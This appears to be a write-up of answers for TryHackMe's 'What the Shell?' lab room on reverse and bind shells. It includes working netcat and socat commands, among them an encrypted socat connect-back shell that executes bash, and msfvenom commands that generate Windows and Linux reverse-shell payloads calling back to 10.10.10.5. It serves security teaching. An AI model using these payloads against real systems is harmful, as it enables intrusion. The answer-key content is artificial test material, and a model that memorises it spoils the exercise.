TryHackMe What the Shell Writeup

This is a write-up for a room called 'What the Shell?' on TryHackMe.

Task 3 Types of Shell

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A:  R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A:  N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A:  T

   

Task 4 Netcat 

Q:  Which option tells netcat to listen?

A:  -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080 

 

Task 5 Netcat Shell Stabilisation

Q: How would you change your terminal size to have 238 columns?

A:  stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A:  sudo python3 -m http.server 80

 

Task 6 Socat  

Q: How would we get socat to listen on TCP port 8080?

A:  TCP-L:8080 

 

Task 7 Socat Encrypted Shells

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

A:  socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q:  If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A:  socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

 

Task 8 Common Shell Payloads

Q: What command can be used to create a named pipe in Linux?

A:  mkfifo 

 

Task 9 msfvenom  

Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port

A:  msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>

Q: Which symbol is used to show that a shell is stageless?

A:  _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell.

A:  msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

 

Task 10 Metasploit multi/handler 

Q: What command can be used to start a listener in the background?

A:  exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A:  sessions 10

Task 13 Practice and Examples
